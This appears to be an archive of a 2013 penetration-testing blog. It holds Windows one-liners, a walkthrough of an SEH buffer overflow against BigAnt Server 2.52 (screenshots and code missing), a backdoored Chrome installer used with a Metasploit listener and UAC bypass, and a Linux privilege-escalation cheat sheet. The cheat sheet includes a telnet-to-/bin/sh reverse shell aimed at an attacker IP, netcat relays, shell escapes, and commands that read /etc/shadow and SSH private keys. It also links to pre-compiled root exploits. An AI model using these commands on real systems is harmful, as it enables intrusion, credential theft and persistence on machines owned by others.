Wednesday, February 27, 2013

One liner commands - Windows

Remotely determine logged in user:
wmic /node:remotecomputer computersystem get username

List running processes:
wmic process list brief

Kill a process:
wmic process where name="cmd.exe" delete

Determine open shares:
net share
wmic share list brief

Determine IP address:
ipconfig

Get a new IP address:
ipconfig /release
ipconfig /renew

Remotely display machine’s MAC address:
wmic /node:machinename nic get macaddress

Remotely list running processes every second:

wmic /node:machinename process list brief /every:1

Remotely display System Info:
wmic /node:machinename computersystem list full

Disk drive information:
wmic diskdrive list full
wmic partition list full

Bios info:
wmic bios list full

List all patches:

wmic qfe

Look for a particular patch:

wmic qfe where hotfixid="KB958644" list full

Remotely List Local Enabled Accounts:
wmic /node:machinename USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name

Start a service remotely:
wmic /node:machinename 4 service lanmanserver CALL Startservice
sc \\machinename start lanmanserver

List services:
wmic service list brief
sc \\machinename query

Disable startup service:
sc config example disabled

List user accounts:
wmic useraccount list brief

Enable RDP remotely:
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where AllowTSConnections=“0” call SetAllowTSConnections “1”

List number of times a user logged on:
wmic netlogin where (name like "%adm%") get numberoflogons

Query active RDP sessions:
qwinsta /server:192.168.1.1

Remove active RDP session ID 2:
rwinsta /server:192.168.1.1 2

Remotely query registry for last logged in user:
reg query "\\computername\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName

List all computers in domain “blah”:
dsquery computer "OU=example,DC=blah" -o rdn -limit 6000 > output.txt

Reboot:
shutdown /r /t 0

Shutdown:
shutdown /s /t 0

Remotely reboot machine:
shutdown /m \\192.168.1.1 /r /t 0 /f

Copy entire folder and its contents from a remote source to local machine:
xcopy /s \\remotecomputer\directory c:\local

Find location of file with string “blah” in file name:

dir c:\ /s /b | find "blah"

Spawn a new command prompt:
start cmd

Determine name of a machine with known IP:
nbtstat -A 192.168.1.1

Find directory named blah:
dir c:\ /s /b /ad | find "blah"

Command line history:
F7

Determine the current user (aka whoami Linux equivalent):
echo %USERNAME%

Determine who is apart of the administrators group:
net localgroup administrators

Add a user where bob is the username and password is blah:
net user bob blah /add

Add user bob to administrators group:
net localgroup administrators bob /add

List user accounts:
net user

Map a network share with a given drive letter of T:
net use T: \\serverNameOrIP\shareName

List network connections and the programs that are making those connections:
netstat -nba

Display contents of file text.txt:
type text.txt

Edit contents of file text.txt:
edit text.txt

Determine PC name:
hostname

Run cmd.exe as administrator user:
runas /user:administrator cmd

Uninstall a program, Symantec in this case ;-}:
wmic product where “description=’Symantec’ ” uninstall

Determine whether a system is 32 or 64 bit:
wmic cpu get DataWidth /format:list

Powershell one liner download file:
(new-object System.Net.WebClient).Downloadfile("http://example.com/file.txt", "C:\Users\bob\file.txt")

Information about OS version and other useful system information:
systeminformation

Startup applications:
wmic startup get caption,command

Recursively unzip all zip folders, you’ll need unzip.exe for this:
FOR /R %a (*.zip) do unzip -d unzipDir "%a"

Saturday, February 9, 2013

Buffer Overflow SEH Overwrite part 3

BigAnt Server 2.52

First the attacker enumerates machine's on the internet, using nmap etc... Attacker finds a machine running BigAnt Server 2.52. Second, after conducting more enumeration on the target machine the attacker sets up a test machine to mirror our target machine. In this situation I have used a Windows XP machine, set up as a virtual machine. Third, in this case I will refer to our test machine as 'victim' with an ip address of 172.16.94.133, the attacking machine will be known as 'attacker' with an ip address of 172.16.94.173.

Attach debugger to running process "AntServer.exe"















Skeleton exploit to send to the "victim" machine



















Send skeleton exploit to the victim machine, and the debugger halt the execution flow of the program with an overwrite of the ESI register of A's, or as seen above in our skeleton exploit "\x41"





















Still in the debugger go to view > seh chain. Notice our seh chain has been overwritten by all A's or "\x41" as well!























Go back to main window and select SHIFT + F9, and we pass the seh exception with an overwrite of EIP, again with all A's or "\x41"















On the attackers machine we generate a 2500 byte generic string using metasploit.













Add the generic string, we generated from metasploit, to out skeleton exploit. Resend the rewritten skeleton exploit.


















This time ESI gets overwritten with a value of 6Cb7





















Again go to view > seh chain. seh value 42326742





















Using the above two values, 6Cb7 and 42326742, we can use metasploit to determine our 'offsets.'
 Rewrite the skeleton exploit to reflect the new information. Resend.















 The debugger will halt the execution flow of the program, SHIFT+F9 will pass the exception and overwrite EIP with the four A's or "\x41" * 4 as predicted in the above script.


Using a Windows DLL to overwrite the structured exception handler. Go to C:\WINDOWS\system32 and copy vbajet32.dll > to the metasploit DIR in the attacking machine. On the attacker machine run command "msfpescan -i vbajet32.dll" Reference the DLLCharacteristics, note the output
0x0000000 this means we can use this DLL to locate a seh overwrite address.
































In the main debugger windows go to "E" in between L and M.on the main task bar of Ollydbg.
 Click on the "E" button and double click on "vbajet32.dll" now right click and choose "Search for" > "Sequence of Commands" a pop up box will appear. Type into the box:
POP r32
POP r32
RETN
Press "Find"





















Copy the POP POP RETN values.





















Set a "breakpoint" on the POP POP RETN address, by pressing SHIFT +F2.




Rewrite the skeleton exploit to reflect the new information found. Restart Ollydbg and set breakpoint on 0F9A196A. Resend skeleton exploit.









We hit our breakpoint. Press SHIFT +F9. Notice we need to jump another 6 bytes to our NOP's. To do this we will use "\x90\x90\x06\xEB" will give us the additional 6 byte jump we need to hit our NOP sled then down to our shellcode .
Rewrite skeleton exploit to reflect out 6 byte jump to NOP's  /with shellcode.























Set up netcat listener on port 443 and resend skeleton exploit. Resend exploit with no Debugger attached to running process on victim machine.

















A quick "ipconfig" on the victim machine to confirm exploitation.























Now we have a working exploit to send across the internet to exploit the machine originally found in our enumeration phase.

Wednesday, February 6, 2013

Fun backdooring Google-Chrome

*note: backdooring technique will be NOT be covered here!
 The backdoored Google-Chrome, custom made to resemble a authentic Chrome-installer.












After executing our exe file, Google-Chrome installs and is fully functional.

Attacking Machine:




























Waiting on the attacking machine is a metasploit reverse listener on port 6666.

























The ps command shows a list of running processes on the windows machine.
Notice the services running are running in no-update\victim state. This indicates I only have "user" privileges. We need to find a way to escalate our privs to an "admin" status.















Using metasploits local privilege escalation exploit, which bypasses UAC controls and escalates our privs to "admin."
 Set options.
Now we can add ourselves as "admin" users, enable remote desktop, enumerate passwords on the system etc....

rooting a linux server part 1


http://download.vulnhub.com/vulnimage/vulnimage.zip

Gaining www-data access on a Linux server, using SQL authentication bypass, tamper data, and a php webshell trick.

Tuesday, February 5, 2013

Linux Priv Escalation



Full creds goes to g0tmi1k!!
http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html

Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release


What's the Kernel version? Is it 64-bit?
cat /proc/version  
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-


What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set


Is there a printer?
lpstat -a


Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service


Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!
ps aux | grep root
ps -ef | grep root


What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/


Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/


What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla


Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network


What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname


What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w


Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee


Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21


Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!


Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)


Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig


Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d:    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l


What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/


Anything "interesting" in the home directorie(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/


Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg


What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history


What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone


What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases


Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/


Is there anything in the log file(s) (Could help with "Local File Includes"!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp


If commands are limited, you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i


How are file-systems mounted?
mount
df -h


Are there any unmounted file-systems?
cat /etc/fstab


What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the  group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null


Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders


Any "problem" files? Word-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files


Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc


How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp


Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com


Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]


(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/


Mitigations
Is any of the above information easy to find? 
Try doing it!
Setup a cron job which automates script(s) and/or 3rd party products


Is the system fully patched? Kernel, operating system, all applications, their  plugins and web services
apt-get update && apt-get upgrade
yum update


Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?


Scripts Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net


Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm


Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html